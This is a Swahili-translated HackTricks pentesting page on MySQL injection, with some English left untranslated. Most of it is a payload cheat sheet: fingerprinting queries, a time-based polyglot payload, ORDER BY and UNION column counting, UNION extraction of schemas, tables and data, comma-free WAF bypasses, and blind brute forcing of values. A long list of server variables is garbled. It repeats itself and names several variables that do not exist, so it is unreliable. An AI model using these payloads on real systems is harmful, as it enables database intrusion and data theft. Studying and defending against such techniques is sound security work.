hacktricks/pentesting-web/sql-injection/mysql-injection
2024-02-11 02:13:58 +00:00
..
mysql-ssrf.md Translated to Swahili 2024-02-11 02:13:58 +00:00
README.md Translated to Swahili 2024-02-11 02:13:58 +00:00

Uingizaji wa MySQL

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni sehemu ya kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

Maoni

-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02

Kazi za Kuvutia

Thibitisha Mysql:

concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)

Kazi Zinazofaa

The following functions can be useful when performing MySQL injection:

version()

This function returns the version of the MySQL database.

database()

This function returns the name of the current database.

user()

This function returns the username used to connect to the MySQL database.

current_user()

This function returns the current user.

@@hostname

This function returns the hostname of the MySQL server.

@@datadir

This function returns the data directory of the MySQL server.

@@basedir

This function returns the base directory of the MySQL server.

@@version_compile_os

This function returns the operating system on which the MySQL server is compiled.

@@secure_file_priv

This function returns the directory where the server can access files.

@@global.have_ssl

This function returns whether the server has SSL support enabled.

@@global.version

This function returns the version of the MySQL server.

@@global.plugin_dir

This function returns the directory where the server plugins are located.

@@global.datadir

This function returns the data directory of the MySQL server.

@@global.innodb_data_home_dir

This function returns the InnoDB data home directory.

@@global.innodb_log_group_home_dir

This function returns the InnoDB log group home directory.

@@global.tmpdir

This function returns the temporary directory used by the server.

@@global.max_allowed_packet

This function returns the maximum allowed packet size for the server.

@@global.max_connections

This function returns the maximum number of connections allowed by the server.

@@global.max_user_connections

This function returns the maximum number of connections allowed for a single user.

@@global.wait_timeout

This function returns the wait timeout value for the server.

@@global.interactive_timeout

This function returns the interactive timeout value for the server.

@@global.log_error

This function returns the path to the error log file.

@@global.log_output

This function returns the log output destination.

@@global.log_bin

This function returns whether binary logging is enabled.

@@global.log_bin_trust_function_creators

This function returns whether function creators are trusted for binary logging.

@@global.log_slave_updates

This function returns whether updates received by a slave server are logged.

@@global.log_slow_queries

This function returns whether slow queries are logged.

@@global.log_warnings

This function returns whether warnings are logged.

@@global.log_queries_not_using_indexes

This function returns whether queries not using indexes are logged.

@@global.log_throttle_queries_not_using_indexes

This function returns whether throttling is applied to queries not using indexes.

@@global.log_slow_admin_statements

This function returns whether slow administrative statements are logged.

@@global.log_slow_slave_statements

This function returns whether slow slave statements are logged.

@@global.log_bin_trust_routine_creators

This function returns whether routine creators are trusted for binary logging.

@@global.log_bin_trust_trigger_creators

This function returns whether trigger creators are trusted for binary logging.

@@global.log_bin_trust_event_creators

This function returns whether event creators are trusted for binary logging.

@@global.log_bin_trust_table_creators

This function returns whether table creators are trusted for binary logging.

@@global.log_bin_trust_function_creators

This function returns whether function creators are trusted for binary logging.

@@global.log_bin_trust_procedure_creators

This function returns whether procedure creators are trusted for binary logging.

@@global.log_bin_trust_view_creators

This function returns whether view creators are trusted for binary logging.

@@global.log_bin_trust_trigger_creators

This function returns whether trigger creators are trusted for binary logging.

@@global.log_bin_trust_event_creators

This function returns whether event creators are trusted for binary logging.

@@global.log_bin_trust_table_creators

This function returns whether table creators are trusted for binary logging.

@@global.log_bin_trust_function_creators

This function returns whether function creators are trusted for binary logging.

@@global.log_bin_trust_procedure_creators

This function returns whether procedure creators are trusted for binary logging.

@@global.log_bin_trust_view_creators

This function returns whether view creators are trusted for binary logging.

SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

Uingizaji wote

Maelezo

Uingizaji ni mbinu ya kuingiza au kubadilisha data katika programu au mfumo wa kompyuta kwa njia ambayo haikutarajiwa au iliyokusudiwa. Katika uwanja wa uingizaji wa SQL, tunazungumzia juu ya kuingiza au kubadilisha data katika mfumo wa usimamizi wa database (DBMS) kama vile MySQL.

MySQL Uingizaji

MySQL ni mfumo maarufu wa usimamizi wa database ambao hutumiwa sana katika maendeleo ya wavuti. Kwa sababu ya umaarufu wake, MySQL ni lengo kuu la mashambulizi ya uingizaji wa SQL.

Katika uingizaji wa MySQL, tunajaribu kuingiza au kubadilisha data katika database ya MySQL kwa kutumia mbinu za uingizaji wa SQL. Hii inaweza kufanyika kupitia maeneo ya kuingiza data katika fomu za wavuti, maombi ya wavuti, au hata URL za wavuti.

Aina za Uingizaji wa MySQL

Kuna aina kadhaa za uingizaji wa MySQL ambazo zinaweza kutumiwa kutekeleza mashambulizi ya uingizaji wa SQL. Hapa kuna baadhi ya aina maarufu:

  • Uingizaji wa kawaida (Classic SQL Injection): Hii ni aina ya uingizaji ambapo tunatumia maingizo ya kawaida ya SQL kubadilisha au kuingiza data katika database ya MySQL.
  • Uingizaji wa kuchelewesha (Time-based SQL Injection): Hii ni aina ya uingizaji ambapo tunatumia kuchelewesha muda wa kutekeleza maagizo ya SQL ili kupata habari kutoka kwa database ya MySQL.
  • Uingizaji wa kosa (Error-based SQL Injection): Hii ni aina ya uingizaji ambapo tunatumia makosa yanayotokea katika maagizo ya SQL ili kupata habari kutoka kwa database ya MySQL.
  • Uingizaji wa kipengele (Blind SQL Injection): Hii ni aina ya uingizaji ambapo hatupati matokeo ya moja kwa moja ya maagizo ya SQL, lakini tunaweza kuthibitisha au kukana hali fulani kwa kutumia maswali ya kweli au ya uwongo.

Kuzuia Uingizaji wa MySQL

Kuzuia uingizaji wa MySQL ni muhimu ili kulinda database yako na data yako. Hapa kuna baadhi ya hatua unazoweza kuchukua kuzuia uingizaji wa MySQL:

  • Tumia vigezo vya maandalizi (prepared statements) au vigezo vya kuingiza (parameterized queries) badala ya kuunda maagizo ya SQL moja kwa moja.
  • Tumia ukaguzi wa kuingiza (input validation) ili kuhakikisha kuwa data inayopokelewa ni sahihi na salama.
  • Sanitiza data kabla ya kuiingiza katika database kwa kuondoa au kubadilisha wahusika hatari.
  • Funga na sasisha mfumo wako wa usimamizi wa database mara kwa mara ili kusahihisha kasoro za usalama.

Kwa kufuata hatua hizi za kuzuia, unaweza kuchukua hatua muhimu za kulinda database yako dhidi ya mashambulizi ya uingizaji wa MySQL.

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

kutoka https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

Mchakato

Kumbuka kwamba katika toleo "la kisasa" la MySQL unaweza kubadilisha "information_schema.tables" na "mysql.innodb_table_stats" (Hii inaweza kuwa na manufaa ya kuepuka WAFs).

SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

Thamani 1 tu

  • group_concat()
  • Limit X,1

Blind moja baada ya nyingine

  • substr(version(),X,1)='r' au substring(version(),X,1)=0x70 au ascii(substr(version(),X,1))=112
  • mid(version(),X,1)='5'

Blind kuongeza

  • LPAD(version(),1...lenght(version()),'1')='asd'...
  • RPAD(version(),1...lenght(version()),'1')='asd'...
  • SELECT RIGHT(version(),1...lenght(version()))='asd'...
  • SELECT LEFT(version(),1...lenght(version()))='asd'...
  • SELECT INSTR('foobarbar', 'fo...')=1

Kugundua idadi ya nguzo

Kwa kutumia ORDER rahisi

order by 1
order by 2
order by 3
...
order by XXX

UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...

MySQL Kulinganisha Kulingana

Maelezo

MySQL Union Based ni mbinu ya kuingiza SQL ambayo inatumika kudhibiti na kupata data kutoka kwa database ya MySQL. Mbinu hii hutumia kauli ya UNION kufanya muunganisho kati ya matokeo ya maswali tofauti ya SQL.

Hatua za Kutekeleza

  1. Kuchunguza tovuti na kutambua maeneo yanayoweza kuwa na udhaifu wa SQL Injection.
  2. Tafuta maeneo ambapo unaweza kuingiza SQL Injection.
  3. Jaribu kuingiza kificho cha SQL Injection kwa kutumia kauli ya UNION.
  4. Angalia ikiwa kuna makosa au ujumbe wa kosa unaonyesha kuwa SQL Injection imefanikiwa.
  5. Ikiwa SQL Injection imefanikiwa, jaribu kubaini muundo wa database na jina la meza.
  6. Tumia kauli ya UNION kufanya muunganisho kati ya maswali tofauti ya SQL na kupata data kutoka kwa database.
  7. Tathmini na utumie data iliyopatikana kwa madhumuni yako ya uchunguzi au uvumbuzi.

Vidokezo vya Usalama

  • Hakikisha kuwa tovuti yako imefungwa na imeboreshwa dhidi ya mashambulizi ya SQL Injection.
  • Tumia vifaa vya usalama kama vile WAF (Web Application Firewall) kuzuia mashambulizi ya SQL Injection.
  • Fanya ukaguzi wa mara kwa mara wa tovuti yako ili kugundua na kurekebisha udhaifu wa SQL Injection.
  • Tumia mbinu za kuzuia kama vile kuchuja na kusafisha data kabla ya kuiingiza kwenye maswali ya SQL.
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

Jifunze hapa chaguzi tofauti za kutumia Mysql injection ili kupata SSRF.

Mbinu za kuvuka WAF

Badala ya Information_schema

Kumbuka kuwa katika toleo "jipya" la MySQL unaweza kubadilisha information_schema.tables na mysql.innodb_table_stats au sys.x$schema_flattened_keys au sys.schema_table_statistics

MySQLinjection bila COMMAS

Chagua safu 2 bila kutumia comma yoyote (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#

Kupata thamani bila jina la safu

Ikiwa kwa wakati fulani unajua jina la meza lakini hujui majina ya safu ndani ya meza hiyo, unaweza jaribu kupata idadi ya safu kwa kutekeleza kitu kama:

# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1);     # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns

Kukisia kuna safu 2 (ambapo ya kwanza ni ID) na nyingine ni bendera, unaweza kujaribu kuvunja nguvu maudhui ya bendera kwa kujaribu herufi kwa herufi:

# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);

Maelezo zaidi katika https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952

Historia ya MySQL

Unaweza kuona utekelezaji mwingine ndani ya MySQL kwa kusoma meza: sys.x$statement_analysis

Chaguzi za toleo

mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();

Miongozo mingine ya MYSQL injection

Marejeo

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa madhumuni ya kukuza maarifa ya kiufundi, mkutano huu ni sehemu ya kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!